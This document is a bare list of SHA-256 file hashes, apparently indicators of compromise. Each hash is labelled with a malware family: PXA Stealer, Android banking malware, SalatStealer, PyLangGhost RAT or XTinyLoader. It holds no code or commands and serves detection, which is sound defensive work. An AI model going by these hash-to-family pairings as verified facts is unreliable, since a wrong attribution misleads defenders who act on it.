c83ef9e71889b19d9a73ef9e443d166d464ee09260c7abda89620d7e87dbf28c PXA Stealer
55f4070fb8e3b6676e18b5ed1067dd04cee4c2bf247e4c472f74c8c12ae7579b PXA Stealer
84e49399ce23b0d577f589cf4211e7527d50ee42debe5e490f7fd6d46e78dd5e PXA Stealer
2c1025c92925fec9c500e4bf7b4e9580f9342d44e21a34a44c1bce435353216c Android Banking Malware
b01185e1fba96209c01f00728f6265414dfca58c92a66c3b4065a344f72768ce Android Banking Malware
80c6435f859468e660a92fc44a2cd80c059c05801dae38b2478c5874429f12a0 Android Banking Malware
59c6a0431d25be7e952fcfb8bd00d3815d8b5341c4b4de54d8288149090dcd74 Android Banking Malware
40bae6f2f736fcf03efdbe6243ff28c524dba602492b0dbb5fd280910a87282d Android Banking Malware
8b94f5fa94f35e5ba47ce260b009b34401c5c54042d7b7252c8c7d13bf8d9f05 SalatStealer (WEB_RAT)
bb794019f8a63966e4a16063dc785fafe8a5f7c7553bcd3da661c7054c6674c7 PyLangGhost RAT
c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb PyLangGhost RAT
c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45 PyLangGhost RAT
a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940 PyLangGhost RAT
ef04a839f60911a5df2408aebd6d9af432229d95b4814132ee589f178005c72f PyLangGhost RAT
e20f1db8d1b5aabb02c30f519eccca478917073cb99a253a8dbcd2a08178a75e XTinyLoader
c638a26d07b963ae0847aa1db66dabd984114d12fdccc705e4323d2699bef552 XTinyLoader
b98b360fbc569c15da4794979e65d50eb388c536883e9426c1459a09a7493e32 XTinyLoader
cb8e51509572da021549b08d153773df46f02d481d795e39e2a1ebf03d1cdba4 XTinyLoader